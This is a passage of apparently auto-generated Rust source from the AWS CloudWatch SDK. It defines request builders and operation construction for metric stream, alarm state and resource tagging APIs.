/// </ul>
pub fn role_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.role_arn = Some(input.into());
self
}
pub fn set_role_arn(mut self, input: std::option::Option<std::string::String>) -> Self {
self.role_arn = input;
self
}
/// <p>The output format for the stream. Valid values are <code>json</code>
/// and <code>opentelemetry0.7</code>. For more information about metric stream
/// output formats, see
/// <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/CloudWatch-metric-streams-formats.html">
/// Metric streams output formats</a>.</p>
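        /// <p>A sketch of selecting the JSON format (the variant name is assumed from the
        /// value <code>json</code>):</p>
        ///
        /// ```ignore
        /// let input = aws_sdk_cloudwatch::input::PutMetricStreamInput::builder()
        ///     .name("my-stream")
        ///     .firehose_arn(firehose_arn) // ARN of an existing delivery stream
        ///     .role_arn(role_arn)         // role with firehose:PutRecord* permissions
        ///     .output_format(aws_sdk_cloudwatch::model::MetricStreamOutputFormat::Json)
        ///     .build()?;
        /// ```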
pub fn output_format(mut self, input: crate::model::MetricStreamOutputFormat) -> Self {
self.output_format = Some(input);
self
}
pub fn set_output_format(
mut self,
input: std::option::Option<crate::model::MetricStreamOutputFormat>,
) -> Self {
self.output_format = input;
self
}
        /// Appends an item to `tags`; use `set_tags` to replace the whole list.
        pub fn tags(mut self, input: impl Into<crate::model::Tag>) -> Self {
let mut v = self.tags.unwrap_or_default();
v.push(input.into());
self.tags = Some(v);
self
}
pub fn set_tags(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Tag>>,
) -> Self {
self.tags = input;
self
}
/// Consumes the builder and constructs a [`PutMetricStreamInput`](crate::input::PutMetricStreamInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::PutMetricStreamInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::PutMetricStreamInput {
name: self.name,
include_filters: self.include_filters,
exclude_filters: self.exclude_filters,
firehose_arn: self.firehose_arn,
role_arn: self.role_arn,
output_format: self.output_format,
tags: self.tags,
})
}
}
}
#[doc(hidden)]
pub type PutMetricStreamInputOperationOutputAlias = crate::operation::PutMetricStream;
#[doc(hidden)]
pub type PutMetricStreamInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl PutMetricStreamInput {
/// Consumes the builder and constructs an Operation<[`PutMetricStream`](crate::operation::PutMetricStream)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::PutMetricStream,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_put_metric_stream(&self).map_err(
|err| smithy_http::operation::BuildError::SerializationError(err.into()),
)?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::PutMetricStream::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"PutMetricStream",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`PutMetricStreamInput`](crate::input::PutMetricStreamInput)
pub fn builder() -> crate::input::put_metric_stream_input::Builder {
crate::input::put_metric_stream_input::Builder::default()
}
}
/// See [`SetAlarmStateInput`](crate::input::SetAlarmStateInput)
pub mod set_alarm_state_input {
/// A builder for [`SetAlarmStateInput`](crate::input::SetAlarmStateInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) alarm_name: std::option::Option<std::string::String>,
pub(crate) state_value: std::option::Option<crate::model::StateValue>,
pub(crate) state_reason: std::option::Option<std::string::String>,
pub(crate) state_reason_data: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The name of the alarm.</p>
pub fn alarm_name(mut self, input: impl Into<std::string::String>) -> Self {
self.alarm_name = Some(input.into());
self
}
pub fn set_alarm_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.alarm_name = input;
self
}
        /// <p>The value of the state: <code>OK</code>, <code>ALARM</code>, or <code>INSUFFICIENT_DATA</code>.</p>
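        /// <p>A sketch of driving a hypothetical alarm into ALARM state to test its
        /// actions (the variant name is assumed from the state value):</p>
        ///
        /// ```ignore
        /// let input = aws_sdk_cloudwatch::input::SetAlarmStateInput::builder()
        ///     .alarm_name("HighLatency")
        ///     .state_value(aws_sdk_cloudwatch::model::StateValue::Alarm)
        ///     .state_reason("Testing alarm actions")
        ///     .build()?;
        /// ```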
pub fn state_value(mut self, input: crate::model::StateValue) -> Self {
self.state_value = Some(input);
self
}
pub fn set_state_value(
mut self,
input: std::option::Option<crate::model::StateValue>,
) -> Self {
self.state_value = input;
self
}
/// <p>The reason that this alarm is set to this specific state, in text format.</p>
pub fn state_reason(mut self, input: impl Into<std::string::String>) -> Self {
self.state_reason = Some(input.into());
self
}
pub fn set_state_reason(mut self, input: std::option::Option<std::string::String>) -> Self {
self.state_reason = input;
self
}
/// <p>The reason that this alarm is set to this specific state, in JSON format.</p>
        /// <p>For SNS or EC2 alarm actions, this is just informational. But for EC2 Auto Scaling or Application Auto Scaling
/// alarm actions, the Auto Scaling policy uses the information in this field to take the correct action.</p>
pub fn state_reason_data(mut self, input: impl Into<std::string::String>) -> Self {
self.state_reason_data = Some(input.into());
self
}
pub fn set_state_reason_data(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.state_reason_data = input;
self
}
/// Consumes the builder and constructs a [`SetAlarmStateInput`](crate::input::SetAlarmStateInput)
pub fn build(
self,
) -> std::result::Result<crate::input::SetAlarmStateInput, smithy_http::operation::BuildError>
{
Ok(crate::input::SetAlarmStateInput {
alarm_name: self.alarm_name,
state_value: self.state_value,
state_reason: self.state_reason,
state_reason_data: self.state_reason_data,
})
}
}
}
#[doc(hidden)]
pub type SetAlarmStateInputOperationOutputAlias = crate::operation::SetAlarmState;
#[doc(hidden)]
pub type SetAlarmStateInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl SetAlarmStateInput {
/// Consumes the builder and constructs an Operation<[`SetAlarmState`](crate::operation::SetAlarmState)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::SetAlarmState,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_set_alarm_state(&self).map_err(
|err| smithy_http::operation::BuildError::SerializationError(err.into()),
)?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::SetAlarmState::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"SetAlarmState",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`SetAlarmStateInput`](crate::input::SetAlarmStateInput)
pub fn builder() -> crate::input::set_alarm_state_input::Builder {
crate::input::set_alarm_state_input::Builder::default()
}
}
/// See [`StartMetricStreamsInput`](crate::input::StartMetricStreamsInput)
pub mod start_metric_streams_input {
/// A builder for [`StartMetricStreamsInput`](crate::input::StartMetricStreamsInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl Builder {
        /// Appends an item to `names`; use `set_names` to replace the whole list.
        pub fn names(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.names.unwrap_or_default();
v.push(input.into());
self.names = Some(v);
self
}
pub fn set_names(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.names = input;
self
}
/// Consumes the builder and constructs a [`StartMetricStreamsInput`](crate::input::StartMetricStreamsInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::StartMetricStreamsInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::StartMetricStreamsInput { names: self.names })
}
}
}
#[doc(hidden)]
pub type StartMetricStreamsInputOperationOutputAlias = crate::operation::StartMetricStreams;
#[doc(hidden)]
pub type StartMetricStreamsInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl StartMetricStreamsInput {
/// Consumes the builder and constructs an Operation<[`StartMetricStreams`](crate::operation::StartMetricStreams)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::StartMetricStreams,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_start_metric_streams(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::StartMetricStreams::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"StartMetricStreams",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`StartMetricStreamsInput`](crate::input::StartMetricStreamsInput)
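///
/// A minimal usage sketch (the stream names are illustrative assumptions);
/// `names` appends a single name, so call it once per stream:
///
/// ```text
/// let input = crate::input::start_metric_streams_input::Builder::default()
///     .names("stream-a")
///     .names("stream-b")
///     .build()?;
/// ```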
pub fn builder() -> crate::input::start_metric_streams_input::Builder {
crate::input::start_metric_streams_input::Builder::default()
}
}
/// See [`StopMetricStreamsInput`](crate::input::StopMetricStreamsInput)
pub mod stop_metric_streams_input {
/// A builder for [`StopMetricStreamsInput`](crate::input::StopMetricStreamsInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl Builder {
/// Appends an item to `names`.
///
/// To override the contents of this collection use [`set_names`](Self::set_names).
pub fn names(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.names.unwrap_or_default();
v.push(input.into());
self.names = Some(v);
self
}
/// Sets `names`, replacing any values previously appended.
pub fn set_names(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.names = input;
self
}
/// Consumes the builder and constructs a [`StopMetricStreamsInput`](crate::input::StopMetricStreamsInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::StopMetricStreamsInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::StopMetricStreamsInput { names: self.names })
}
}
}
#[doc(hidden)]
pub type StopMetricStreamsInputOperationOutputAlias = crate::operation::StopMetricStreams;
#[doc(hidden)]
pub type StopMetricStreamsInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl StopMetricStreamsInput {
/// Consumes the builder and constructs an Operation<[`StopMetricStreams`](crate::operation::StopMetricStreams)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::StopMetricStreams,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_stop_metric_streams(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::StopMetricStreams::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"StopMetricStreams",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`StopMetricStreamsInput`](crate::input::StopMetricStreamsInput)
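///
/// A minimal usage sketch (the stream name is an illustrative assumption):
///
/// ```text
/// let input = crate::input::stop_metric_streams_input::Builder::default()
///     .names("stream-a")
///     .build()?;
/// ```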
pub fn builder() -> crate::input::stop_metric_streams_input::Builder {
crate::input::stop_metric_streams_input::Builder::default()
}
}
/// See [`TagResourceInput`](crate::input::TagResourceInput)
pub mod tag_resource_input {
/// A builder for [`TagResourceInput`](crate::input::TagResourceInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) resource_arn: std::option::Option<std::string::String>,
pub(crate) tags: std::option::Option<std::vec::Vec<crate::model::Tag>>,
}
impl Builder {
/// <p>The ARN of the CloudWatch resource that you're adding tags to.</p>
/// <p>The ARN format of an alarm is
/// <code>arn:aws:cloudwatch:<i>Region</i>:<i>account-id</i>:alarm:<i>alarm-name</i>
/// </code>
/// </p>
/// <p>The ARN format of a Contributor Insights rule is
/// <code>arn:aws:cloudwatch:<i>Region</i>:<i>account-id</i>:insight-rule:<i>insight-rule-name</i>
/// </code>
/// </p>
/// <p>For more information about ARN format, see <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/list_amazoncloudwatch.html#amazoncloudwatch-resources-for-iam-policies"> Resource
/// Types Defined by Amazon CloudWatch</a> in the <i>Amazon Web Services General
/// Reference</i>.</p>
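/// <p>For example, an alarm ARN might look like
/// <code>arn:aws:cloudwatch:us-east-1:123456789012:alarm:my-alarm</code>
/// (the Region, account ID, and alarm name here are illustrative).</p>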
pub fn resource_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.resource_arn = Some(input.into());
self
}
/// Sets the ARN of the CloudWatch resource that you're adding tags to.
pub fn set_resource_arn(mut self, input: std::option::Option<std::string::String>) -> Self {
self.resource_arn = input;
self
}
/// Appends an item to `tags`.
///
/// To override the contents of this collection use [`set_tags`](Self::set_tags).
pub fn tags(mut self, input: impl Into<crate::model::Tag>) -> Self {
let mut v = self.tags.unwrap_or_default();
v.push(input.into());
self.tags = Some(v);
self
}
/// Sets `tags`, replacing any values previously appended.
pub fn set_tags(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Tag>>,
) -> Self {
self.tags = input;
self
}
/// Consumes the builder and constructs a [`TagResourceInput`](crate::input::TagResourceInput)
pub fn build(
self,
) -> std::result::Result<crate::input::TagResourceInput, smithy_http::operation::BuildError>
{
Ok(crate::input::TagResourceInput {
resource_arn: self.resource_arn,
tags: self.tags,
})
}
}
}
#[doc(hidden)]
pub type TagResourceInputOperationOutputAlias = crate::operation::TagResource;
#[doc(hidden)]
pub type TagResourceInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl TagResourceInput {
/// Consumes the builder and constructs an Operation<[`TagResource`](crate::operation::TagResource)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::TagResource,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body =
crate::operation_ser::serialize_operation_tag_resource(&self).map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::TagResource::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"TagResource",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`TagResourceInput`](crate::input::TagResourceInput)
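///
/// A minimal usage sketch (the ARN, tag values, and the `Tag::builder()`
/// accessors are assumptions based on the generated-builder pattern, not
/// confirmed in this file):
///
/// ```text
/// let tag = crate::model::Tag::builder().key("team").value("metrics").build();
/// let input = crate::input::tag_resource_input::Builder::default()
///     .resource_arn("arn:aws:cloudwatch:us-east-1:123456789012:alarm:my-alarm")
///     .tags(tag)
///     .build()?;
/// ```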
pub fn builder() -> crate::input::tag_resource_input::Builder {
crate::input::tag_resource_input::Builder::default()
}
}
/// See [`UntagResourceInput`](crate::input::UntagResourceInput)
pub mod untag_resource_input {
/// A builder for [`UntagResourceInput`](crate::input::UntagResourceInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) resource_arn: std::option::Option<std::string::String>,
pub(crate) tag_keys: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl Builder {
/// <p>The ARN of the CloudWatch resource that you're removing tags from.</p>
/// <p>The ARN format of an alarm is
/// <code>arn:aws:cloudwatch:<i>Region</i>:<i>account-id</i>:alarm:<i>alarm-name</i>
/// </code>
/// </p>
/// <p>The ARN format of a Contributor Insights rule is
/// <code>arn:aws:cloudwatch:<i>Region</i>:<i>account-id</i>:insight-rule:<i>insight-rule-name</i>
/// </code>
/// </p>
/// <p>For more information about ARN format, see <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/list_amazoncloudwatch.html#amazoncloudwatch-resources-for-iam-policies"> Resource
/// Types Defined by Amazon CloudWatch</a> in the <i>Amazon Web Services General
/// Reference</i>.</p>
pub fn resource_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.resource_arn = Some(input.into());
self
}
/// Sets the ARN of the CloudWatch resource that you're removing tags from.
pub fn set_resource_arn(mut self, input: std::option::Option<std::string::String>) -> Self {
self.resource_arn = input;
self
}
/// Appends an item to `tag_keys`.
///
/// To override the contents of this collection use [`set_tag_keys`](Self::set_tag_keys).
pub fn tag_keys(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.tag_keys.unwrap_or_default();
v.push(input.into());
self.tag_keys = Some(v);
self
}
/// Sets `tag_keys`, replacing any values previously appended.
pub fn set_tag_keys(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.tag_keys = input;
self
}
/// Consumes the builder and constructs an [`UntagResourceInput`](crate::input::UntagResourceInput)
pub fn build(
self,
) -> std::result::Result<crate::input::UntagResourceInput, smithy_http::operation::BuildError>
{
Ok(crate::input::UntagResourceInput {
resource_arn: self.resource_arn,
tag_keys: self.tag_keys,
})
}
}
}
#[doc(hidden)]
pub type UntagResourceInputOperationOutputAlias = crate::operation::UntagResource;
#[doc(hidden)]
pub type UntagResourceInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl UntagResourceInput {
/// Consumes the builder and constructs an Operation<[`UntagResource`](crate::operation::UntagResource)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::UntagResource,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body =
crate::operation_ser::serialize_operation_untag_resource(&self).map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::UntagResource::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"UntagResource",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`UntagResourceInput`](crate::input::UntagResourceInput)
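///
/// A minimal usage sketch (the ARN and tag key are illustrative assumptions):
///
/// ```text
/// let input = crate::input::untag_resource_input::Builder::default()
///     .resource_arn("arn:aws:cloudwatch:us-east-1:123456789012:alarm:my-alarm")
///     .tag_keys("team")
///     .build()?;
/// ```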
pub fn builder() -> crate::input::untag_resource_input::Builder {
crate::input::untag_resource_input::Builder::default()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct UntagResourceInput {
/// <p>The ARN of the CloudWatch resource that you're removing tags from.</p>
/// <p>The ARN format of an alarm is
/// <code>arn:aws:cloudwatch:<i>Region</i>:<i>account-id</i>:alarm:<i>alarm-name</i>
/// </code>
/// </p>
/// <p>The ARN format of a Contributor Insights rule is
/// <code>arn:aws:cloudwatch:<i>Region</i>:<i>account-id</i>:insight-rule:<i>insight-rule-name</i>
/// </code>
/// </p>
/// <p>For more information about ARN format, see <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/list_amazoncloudwatch.html#amazoncloudwatch-resources-for-iam-policies"> Resource
/// Types Defined by Amazon CloudWatch</a> in the <i>Amazon Web Services General
/// Reference</i>.</p>
pub resource_arn: std::option::Option<std::string::String>,
/// <p>The list of tag keys to remove from the resource.</p>
